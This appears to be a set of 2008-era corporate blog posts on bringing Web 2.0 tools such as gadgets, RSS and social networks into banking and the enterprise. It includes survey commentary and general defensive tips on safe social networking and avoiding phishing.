Secure Enterprise 2.0 Blog

What does your bank have in common with Facebook? Nothing spectacular just yet, but if the latest analyst report from Celent is right on the money, then you will soon be able to pay that credit card bill or get a loan while chatting things up with your Facebook friends or checking out sports news on iGoogle.

That’s right, Web 2.0 is coming to your local bank, which makes a lot of sense for both banks and customers. Ever since the explosion of online retail banking, the market has been saturated with similar limited-capabilities websites. So much so, that there is really not much differentiation between the different websites out there.

Meanwhile, customers want full control of their personal finances - to be able to access account information when, how and wherever they want to.

And so, as banks try to find meaningful ways to engage customers, tools such as an iGoogle or MyYahoo personal banking gadget will soon be available at your fingertips.

In fact, financial research firm Celent has recently issued a report on the state of Banking with Web 2.0, reaching some very interesting conclusions -

• 12-18 months before Web 2.0 Banking is reality - banks are already trying to figure out the right technology to offer these tools to consumers, though there is still much work to be done especially as the banking industry continues to experience a downturn.
• Security is critical - an absolute prerogative for any financial institution implementing a new technology, which often brings with it emerging security issues. One industry forum that’s tackling this problem is the Secure Enterprise 2.0 Forum.
• Advanced banking web 2.0 tools to hit the market in late 2008 - which means that some vendors have already had a head start (shameless self-promotion).

(Get the full report here.)

So if Web 2.0 has anything to do with it, you’ll likely be reaching for your mouse, instead of your wallet, sooner than you know it.

eWEEK just came out with an interesting survey on how and why businesses are “diving into Web 2.0 Waters“.

Over half of survey respondents said their companies are allowing access to social networks at work. Granted, with a pool of some 282 IT professionals, we can’t claim victory just yet. But this is still an important indicator of how enterprises are gravitating towards social consumer technology.

There is good news and bad news that arise out of this survey:

Want the good news first? - When asked what are the drivers for implementing Web 2.0 tools at work, over 70 percent said they are looking for improved communications and collaboration internally and 49 percent said they are looking to reach consumers. In other words, Enterprise 2.0 tools (social networks, RSS, social bookmarking, blogs, etc) are becoming valid business tools.

The bad news? Wherever access is blocked, workers are using these tools unsanctioned by IT or management, putting enterprise data at risk. Nearly half of respondents revealed at least one rogue Web 2.0 app at their company. The security risks are considerable if companies do not provide a secure environment for their employees.

And how are companies dealing with the groundswell? Not very effectively. When asked whether their companies had implemented policies regulating the use of Web 2.0 technologies by employees, only 28 percent said yes.

So there is still much more work to be done, though the benefits of using Web 2.0 to get things done at work are already stepping into the limelight.

With usage of public Web 2.0 services such as personalized homepages and social networks growing daily, these services become an increasingly significant tool in the information worker’s toolbox. They are used to network, collaborate, research and stay up-to-date on the latest news and trends.

At the same time, concern arises for the potential security risks involved. In many organizations, the knee-jerk reaction of the information security organization is “block out and lock down” – block the services at the web access layer and make sure all workstations are locked down.

Even if such locks and blocks could be implemented effectively, which is questionable, CISOs should reexamine whether such a strategy is best in the long term. Keeping the latest Web technologies out of the workplace can have a detrimental effect on productivity, as well as employee moral and retention. Ultimately, organizations that decide to lock out the Web today may find themselves left behind.

All that said, security challenges are real, and the intuitive reaction of many organizations is not unjustified. New technologies provide new capabilities but also present new risks like an employee publishing proprietary information on a public blog or using a public bookmarking site as a research tool. Other security breaches may be more elaborate and malicious in nature, such as phishing attempts or newfangled attacks against the latest Web technologies in use within the organization (e.g. JavaScript hijacking and script injection in RSS feeds).

For information security professionals, a balance needs to be struck between providing employees with the tools they need to be productive and maintaining sufficient control to keep security incidents at an acceptable level.

First and foremost, it is critical to define and implement clear use policies for Web 2.0 tools both inside and outside the organization.

In addition to defining policies, there are technical measures that can be taken to reduce the risk of using Web 2.0 technologies in the enterprise:

• Place a middle tier between information back-end systems and Web 2.0 front-ends – Web 2.0 front-ends such as RSS and AJAX gadgets tend to generate many requests. It is therefore advisable to include a middle tier that is optimized for Web 2.0 front-ends and capable of communicating efficiently with back-ends.
• Leverage existing security mechanisms – even when accessing data from Web 2.0 front ends, there is no reason not to leverage existing enterprise single-sign-on or centralized access management.
• Provisioning is critical – maintain full control of application and data provisioning, regardless of how data is consumed or where applications run.
• Address ‘Attacks 2.0’ from the get-go – train developers on the risks specific to Web 2.0 technologies and the accepted best practices to handle them.

The benefits of using Web 2.0 tools in the enterprise are many, ranging from increased productivity to improved employee retention. As with all new technologies, with new capabilities come new risks. While mitigating these risks is challenging, preventing the use of such tools altogether is, in the long term, a much more risky strategy.

Yuval

E-Banking is great. It really is. I access my bank’s e-banking application at least a couple of times a month. I check my balance, look at the latest transactions, make sure the paycheck came in on time and then try to figure out where it all went…

I’ve been using e-banking for at least five years, and I recently realized, while trying to figure out the latest installment of ‘The Mystery of the Disappearing Dollars’, how little the experience has changed in those five years.

The Web has advanced tremendously and broadband Internet has led to an explosion of rich content, online voice and video communication, social networking, personalized home pages, gadgets, widgets, RSS and many other useful tools and services.

Yet, my e-banking application still shows the same balance and transactions page, lets me run the same queries, performs the same transfers and generates the same statements and reports. (It also shows a disturbingly consistent savings account balance, but that’s a different story).

Financial institutes and commercial banks in particular have always been conservative organizations, and rightfully so. We entrust them with our most valued assets. We expect them to safeguard those assets with prudence and diligence, and not hop on to any passing technological bandwagon just because it’s cool. But the Web 2.0 technologies I talk about can no longer be considered a passing fad. They have become ingrained in how we spend our time online, how we work and play, and slowly but surely, these technologies are making headway in the banking space.

Even today, if you search RSS and gadget directories you will find that some banks and related organizations are using Web 2.0 channels to stay in touch with customers and provide useful information (for instance, visit iGoogle, click on ‘add stuff‘ and then search for ‘American Express‘).

Now picture a gadget on your iGoogle page that lets you know at a glance what your credit card balance is and when your next payment is due, or an RSS feed that gets populated on the fly whenever your bank account is debited for an amount over $500. With the advent of tools that allow banks to deliver these types of services with the same level of security provided by existing e-banking applications, the widespread availability of such services is only a matter of time.

What does this mean for us? Well, for one thing, we’ll finally see a change in those good-old e-banking applications, and I’ll have one less thing to rant about, but more importantly, we’ll be able to access our banking information online where and when we want it, and take control over our finances. After all, I visit my e-banking site twice a month, but I visit iGoogle a dozen times a day.

Yuval

I am often asked how to best leverage the social networking world for business purposes and personal growth.  So I have put together a short list that sums up a few pointers to get you started on secure enterprise social networking:

1. Set limits about what you are willing to expose about yourself and remember the context of the interaction (business or personal). Be wary, since embarrassing or inappropriate information about yourself may appear in contexts that you did not expect. It is very difficult to “clean up” your profile later on.
2. Social networks are not just for play. Treat the network as a resource of valuable information, and tap into your colleagues’ expertise with the collaborative tools available on the network.
3. Educate your social networking friends, and they will rely on you as a valuable resource. Incorporate news items, blog posts and interesting tidbits into the discussion. Social networks are all about sharing information with your friends and work colleagues. 
4. Try and build a single “space” where all your friends meet – work, family, etc. Many of these contacts are more than just friends, co-workers or professional acquaintances anyways. Trying to work with multiple networking platforms makes life confusing and much harder to network.
5. Do not spam your friends or network. Most social networking platforms have a sophisticated yet absolutely lethal mechanism to eradicate spammers or “unsolicited evangelists”. You can still talk about the issues that matter to you and engage friends and coworkers using the collaboration tools available on the network, without exploiting them.
6. Word of advice - do not badmouth your company’s customers in an open discussion group. It is bound to bounce back and one day you may find a cardboard box with your name on it waiting on your desk. Be civilized in your discussions.
7. Secret is not secured. Some social networks, like Facebook, allow users to engage in private or secret groups. Although these forums take place away from the public eye, apt hackers can still crack open the discussion boards and access conversations, unless appropriate enterprise-grade safeguards have been put in place.
8. When adding RSS feeds to a feed reader, always prefer to use a link you got from the content provider’s web site rather than from any third party (an email, an IM, a link on a social networking site etc.) This improves the likelihood that the information you are seeing is what the content provider intended.
9. When entering your username and password on any site, always verify first that the URL in the browser’s address bar matches the URL of the site you (think) you are accessing. This is the best way to ensure your password won’t be intercepted by some evil-doer.
10. Never enter your username and password on a page you arrived at by clicking on a link in an email, IM message, third party web site or social networking site. These are the tools hackers use most often to steal passwords. 

David